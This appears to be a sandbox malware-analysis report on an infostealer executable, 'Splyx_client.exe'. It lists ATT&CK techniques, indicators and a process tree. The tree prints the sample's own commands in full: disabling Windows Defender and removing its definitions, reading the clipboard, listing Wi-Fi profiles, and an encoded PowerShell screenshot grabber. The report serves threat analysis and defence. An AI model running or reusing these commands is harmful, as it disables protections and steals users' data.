6084702c9e12f7e05771d6b2d4a5d18b22b7578757713a53b6fbcac525fe4cf9

Analysis

max time kernel
103s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Splyx_client.exe
Size

7.3MB
MD5

0382151ac4d471ceef3f4b35e6c69101
SHA1

979e3ce8b694c83dbb747a1c425a61973ed676fb
SHA256

6084702c9e12f7e05771d6b2d4a5d18b22b7578757713a53b6fbcac525fe4cf9
SHA512

9b309e277f88b5900e5b64724ebeb9475d97e611c83206d9d247da66df6d3dd14fe92c755567bfec806c7a0665511a8af3127129652959db2ad3951a42e94a4b
SSDEEP

196608:SrB1YS6qOshoKMuIkhVastRL5Di3uh1D7JO:iYSpOshouIkPftRL54YRJO

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2668	powershell.exe
2916	powershell.exe
1312	powershell.exe
556	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4564	cmd.exe
4300	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2660	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe
4472	Splyx_client.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
8	tasklist.exe
5112	tasklist.exe
3060	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b8a-21.dat	upx
behavioral1/memory/4472-25-0x00007FFF3E0C0000-0x00007FFF3E6A9000-memory.dmp	upx
behavioral1/files/0x000a000000023b7d-28.dat	upx
behavioral1/memory/4472-30-0x00007FFF50E40000-0x00007FFF50E63000-memory.dmp	upx
behavioral1/files/0x000a000000023b88-29.dat	upx
behavioral1/files/0x000a000000023b84-48.dat	upx
behavioral1/files/0x000a000000023b83-47.dat	upx
behavioral1/files/0x000a000000023b82-46.dat	upx
behavioral1/files/0x0031000000023b81-45.dat	upx
behavioral1/files/0x0031000000023b80-44.dat	upx
behavioral1/files/0x0031000000023b7f-43.dat	upx
behavioral1/files/0x000a000000023b7e-42.dat	upx
behavioral1/files/0x000a000000023b7c-41.dat	upx
behavioral1/files/0x000a000000023b8f-40.dat	upx
behavioral1/files/0x000a000000023b8e-39.dat	upx
behavioral1/files/0x000a000000023b8d-38.dat	upx
behavioral1/files/0x000a000000023b89-35.dat	upx
behavioral1/files/0x000a000000023b87-34.dat	upx
behavioral1/memory/4472-32-0x00007FFF53220000-0x00007FFF5322F000-memory.dmp	upx
behavioral1/memory/4472-54-0x00007FFF50D50000-0x00007FFF50D7D000-memory.dmp	upx
behavioral1/memory/4472-56-0x00007FFF52FF0000-0x00007FFF53009000-memory.dmp	upx
behavioral1/memory/4472-58-0x00007FFF4E250000-0x00007FFF4E273000-memory.dmp	upx
behavioral1/memory/4472-60-0x00007FFF4CBB0000-0x00007FFF4CD27000-memory.dmp	upx
behavioral1/memory/4472-62-0x00007FFF4D710000-0x00007FFF4D729000-memory.dmp	upx
behavioral1/memory/4472-64-0x00007FFF50F20000-0x00007FFF50F2D000-memory.dmp	upx
behavioral1/memory/4472-66-0x00007FFF4D6D0000-0x00007FFF4D703000-memory.dmp	upx
behavioral1/memory/4472-71-0x00007FFF4CE60000-0x00007FFF4CF2D000-memory.dmp	upx
behavioral1/memory/4472-74-0x00007FFF50E40000-0x00007FFF50E63000-memory.dmp	upx
behavioral1/memory/4472-73-0x00007FFF3DBA0000-0x00007FFF3E0C0000-memory.dmp	upx
behavioral1/memory/4472-70-0x00007FFF3E0C0000-0x00007FFF3E6A9000-memory.dmp	upx
behavioral1/memory/4472-76-0x00007FFF4D1D0000-0x00007FFF4D1E4000-memory.dmp	upx
behavioral1/memory/4472-79-0x00007FFF4CFD0000-0x00007FFF4CFDD000-memory.dmp	upx
behavioral1/memory/4472-82-0x00007FFF3D490000-0x00007FFF3D5AC000-memory.dmp	upx
behavioral1/memory/4472-81-0x00007FFF52FF0000-0x00007FFF53009000-memory.dmp	upx
behavioral1/memory/4472-78-0x00007FFF50D50000-0x00007FFF50D7D000-memory.dmp	upx
behavioral1/memory/4472-108-0x00007FFF4E250000-0x00007FFF4E273000-memory.dmp	upx
behavioral1/memory/4472-197-0x00007FFF4CBB0000-0x00007FFF4CD27000-memory.dmp	upx
behavioral1/memory/4472-257-0x00007FFF4D710000-0x00007FFF4D729000-memory.dmp	upx
behavioral1/memory/4472-268-0x00007FFF4D6D0000-0x00007FFF4D703000-memory.dmp	upx
behavioral1/memory/4472-277-0x00007FFF4CE60000-0x00007FFF4CF2D000-memory.dmp	upx
behavioral1/memory/4472-279-0x00007FFF3DBA0000-0x00007FFF3E0C0000-memory.dmp	upx
behavioral1/memory/4472-300-0x00007FFF4D1D0000-0x00007FFF4D1E4000-memory.dmp	upx
behavioral1/memory/4472-301-0x00007FFF3E0C0000-0x00007FFF3E6A9000-memory.dmp	upx
behavioral1/memory/4472-315-0x00007FFF3D490000-0x00007FFF3D5AC000-memory.dmp	upx
behavioral1/memory/4472-307-0x00007FFF4CBB0000-0x00007FFF4CD27000-memory.dmp	upx
behavioral1/memory/4472-302-0x00007FFF50E40000-0x00007FFF50E63000-memory.dmp	upx
behavioral1/memory/4472-476-0x00007FFF4CE60000-0x00007FFF4CF2D000-memory.dmp	upx
behavioral1/memory/4472-475-0x00007FFF4D6D0000-0x00007FFF4D703000-memory.dmp	upx
behavioral1/memory/4472-474-0x00007FFF50F20000-0x00007FFF50F2D000-memory.dmp	upx
behavioral1/memory/4472-473-0x00007FFF4D710000-0x00007FFF4D729000-memory.dmp	upx
behavioral1/memory/4472-472-0x00007FFF4CBB0000-0x00007FFF4CD27000-memory.dmp	upx
behavioral1/memory/4472-471-0x00007FFF4E250000-0x00007FFF4E273000-memory.dmp	upx
behavioral1/memory/4472-470-0x00007FFF52FF0000-0x00007FFF53009000-memory.dmp	upx
behavioral1/memory/4472-469-0x00007FFF50D50000-0x00007FFF50D7D000-memory.dmp	upx
behavioral1/memory/4472-468-0x00007FFF53220000-0x00007FFF5322F000-memory.dmp	upx
behavioral1/memory/4472-479-0x00007FFF4CFD0000-0x00007FFF4CFDD000-memory.dmp	upx
behavioral1/memory/4472-480-0x00007FFF3D490000-0x00007FFF3D5AC000-memory.dmp	upx
behavioral1/memory/4472-478-0x00007FFF4D1D0000-0x00007FFF4D1E4000-memory.dmp	upx
behavioral1/memory/4472-477-0x00007FFF3E0C0000-0x00007FFF3E6A9000-memory.dmp	upx
behavioral1/memory/4472-467-0x00007FFF50E40000-0x00007FFF50E63000-memory.dmp	upx
behavioral1/memory/4472-466-0x00007FFF3DBA0000-0x00007FFF3E0C0000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3464	cmd.exe
1704	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
376	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4228	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
556	powershell.exe
2668	powershell.exe
2668	powershell.exe
556	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
2732	powershell.exe
2732	powershell.exe
2732	powershell.exe
2916	powershell.exe
2916	powershell.exe
4300	powershell.exe
4300	powershell.exe
1312	powershell.exe
1312	powershell.exe
768	powershell.exe
768	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	8	tasklist.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeIncreaseQuotaPrivilege	3348	WMIC.exe
Token: SeSecurityPrivilege	3348	WMIC.exe
Token: SeTakeOwnershipPrivilege	3348	WMIC.exe
Token: SeLoadDriverPrivilege	3348	WMIC.exe
Token: SeSystemProfilePrivilege	3348	WMIC.exe
Token: SeSystemtimePrivilege	3348	WMIC.exe
Token: SeProfSingleProcessPrivilege	3348	WMIC.exe
Token: SeIncBasePriorityPrivilege	3348	WMIC.exe
Token: SeCreatePagefilePrivilege	3348	WMIC.exe
Token: SeBackupPrivilege	3348	WMIC.exe
Token: SeRestorePrivilege	3348	WMIC.exe
Token: SeShutdownPrivilege	3348	WMIC.exe
Token: SeDebugPrivilege	3348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3348	WMIC.exe
Token: SeRemoteShutdownPrivilege	3348	WMIC.exe
Token: SeUndockPrivilege	3348	WMIC.exe
Token: SeManageVolumePrivilege	3348	WMIC.exe
Token: 33	3348	WMIC.exe
Token: 34	3348	WMIC.exe
Token: 35	3348	WMIC.exe
Token: 36	3348	WMIC.exe
Token: SeDebugPrivilege	3060	tasklist.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeIncreaseQuotaPrivilege	3348	WMIC.exe
Token: SeSecurityPrivilege	3348	WMIC.exe
Token: SeTakeOwnershipPrivilege	3348	WMIC.exe
Token: SeLoadDriverPrivilege	3348	WMIC.exe
Token: SeSystemProfilePrivilege	3348	WMIC.exe
Token: SeSystemtimePrivilege	3348	WMIC.exe
Token: SeProfSingleProcessPrivilege	3348	WMIC.exe
Token: SeIncBasePriorityPrivilege	3348	WMIC.exe
Token: SeCreatePagefilePrivilege	3348	WMIC.exe
Token: SeBackupPrivilege	3348	WMIC.exe
Token: SeRestorePrivilege	3348	WMIC.exe
Token: SeShutdownPrivilege	3348	WMIC.exe
Token: SeDebugPrivilege	3348	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3348	WMIC.exe
Token: SeRemoteShutdownPrivilege	3348	WMIC.exe
Token: SeUndockPrivilege	3348	WMIC.exe
Token: SeManageVolumePrivilege	3348	WMIC.exe
Token: 33	3348	WMIC.exe
Token: 34	3348	WMIC.exe
Token: 35	3348	WMIC.exe
Token: 36	3348	WMIC.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeIncreaseQuotaPrivilege	4732	WMIC.exe
Token: SeSecurityPrivilege	4732	WMIC.exe
Token: SeTakeOwnershipPrivilege	4732	WMIC.exe
Token: SeLoadDriverPrivilege	4732	WMIC.exe
Token: SeSystemProfilePrivilege	4732	WMIC.exe
Token: SeSystemtimePrivilege	4732	WMIC.exe
Token: SeProfSingleProcessPrivilege	4732	WMIC.exe
Token: SeIncBasePriorityPrivilege	4732	WMIC.exe
Token: SeCreatePagefilePrivilege	4732	WMIC.exe
Token: SeBackupPrivilege	4732	WMIC.exe
Token: SeRestorePrivilege	4732	WMIC.exe
Token: SeShutdownPrivilege	4732	WMIC.exe
Token: SeDebugPrivilege	4732	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 4472	1080	Splyx_client.exe	82
PID 1080 wrote to memory of 4472	1080	Splyx_client.exe	82
PID 4472 wrote to memory of 3308	4472	Splyx_client.exe	83
PID 4472 wrote to memory of 3308	4472	Splyx_client.exe	83
PID 4472 wrote to memory of 1916	4472	Splyx_client.exe	84
PID 4472 wrote to memory of 1916	4472	Splyx_client.exe	84
PID 4472 wrote to memory of 228	4472	Splyx_client.exe	85
PID 4472 wrote to memory of 228	4472	Splyx_client.exe	85
PID 3308 wrote to memory of 556	3308	cmd.exe	89
PID 3308 wrote to memory of 556	3308	cmd.exe	89
PID 1916 wrote to memory of 2668	1916	cmd.exe	91
PID 1916 wrote to memory of 2668	1916	cmd.exe	91
PID 228 wrote to memory of 3600	228	cmd.exe	90
PID 228 wrote to memory of 3600	228	cmd.exe	90
PID 4472 wrote to memory of 3952	4472	Splyx_client.exe	92
PID 4472 wrote to memory of 3952	4472	Splyx_client.exe	92
PID 4472 wrote to memory of 3876	4472	Splyx_client.exe	93
PID 4472 wrote to memory of 3876	4472	Splyx_client.exe	93
PID 3952 wrote to memory of 8	3952	cmd.exe	96
PID 3952 wrote to memory of 8	3952	cmd.exe	96
PID 3876 wrote to memory of 5112	3876	cmd.exe	97
PID 3876 wrote to memory of 5112	3876	cmd.exe	97
PID 4472 wrote to memory of 376	4472	Splyx_client.exe	98
PID 4472 wrote to memory of 376	4472	Splyx_client.exe	98
PID 4472 wrote to memory of 4564	4472	Splyx_client.exe	99
PID 4472 wrote to memory of 4564	4472	Splyx_client.exe	99
PID 4472 wrote to memory of 4344	4472	Splyx_client.exe	100
PID 4472 wrote to memory of 4344	4472	Splyx_client.exe	100
PID 4472 wrote to memory of 1148	4472	Splyx_client.exe	101
PID 4472 wrote to memory of 1148	4472	Splyx_client.exe	101
PID 4472 wrote to memory of 3464	4472	Splyx_client.exe	105
PID 4472 wrote to memory of 3464	4472	Splyx_client.exe	105
PID 4472 wrote to memory of 1564	4472	Splyx_client.exe	106
PID 4472 wrote to memory of 1564	4472	Splyx_client.exe	106
PID 4472 wrote to memory of 2960	4472	Splyx_client.exe	110
PID 4472 wrote to memory of 2960	4472	Splyx_client.exe	110
PID 4564 wrote to memory of 4300	4564	cmd.exe	143
PID 4564 wrote to memory of 4300	4564	cmd.exe	143
PID 1148 wrote to memory of 4760	1148	cmd.exe	114
PID 1148 wrote to memory of 4760	1148	cmd.exe	114
PID 376 wrote to memory of 3348	376	cmd.exe	115
PID 376 wrote to memory of 3348	376	cmd.exe	115
PID 4344 wrote to memory of 3060	4344	cmd.exe	116
PID 4344 wrote to memory of 3060	4344	cmd.exe	116
PID 2960 wrote to memory of 2732	2960	cmd.exe	117
PID 2960 wrote to memory of 2732	2960	cmd.exe	117
PID 4472 wrote to memory of 4144	4472	Splyx_client.exe	118
PID 4472 wrote to memory of 4144	4472	Splyx_client.exe	118
PID 1564 wrote to memory of 4228	1564	cmd.exe	119
PID 1564 wrote to memory of 4228	1564	cmd.exe	119
PID 3464 wrote to memory of 1704	3464	cmd.exe	120
PID 3464 wrote to memory of 1704	3464	cmd.exe	120
PID 4144 wrote to memory of 4540	4144	cmd.exe	122
PID 4144 wrote to memory of 4540	4144	cmd.exe	122
PID 4472 wrote to memory of 2640	4472	Splyx_client.exe	124
PID 4472 wrote to memory of 2640	4472	Splyx_client.exe	124
PID 2640 wrote to memory of 2952	2640	cmd.exe	126
PID 2640 wrote to memory of 2952	2640	cmd.exe	126
PID 4472 wrote to memory of 2616	4472	Splyx_client.exe	127
PID 4472 wrote to memory of 2616	4472	Splyx_client.exe	127
PID 2732 wrote to memory of 2312	2732	powershell.exe	129
PID 2732 wrote to memory of 2312	2732	powershell.exe	129
PID 2616 wrote to memory of 2388	2616	cmd.exe	130
PID 2616 wrote to memory of 2388	2616	cmd.exe	130

C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe
"C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe
  "C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Splyx_client.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('включите виртуализацию!', 0, 'error please turn virtualization', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:228
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('включите виртуализацию!', 0, 'error please turn virtualization', 32+16);close()"
      4⤵
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3952
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:376
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4344
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
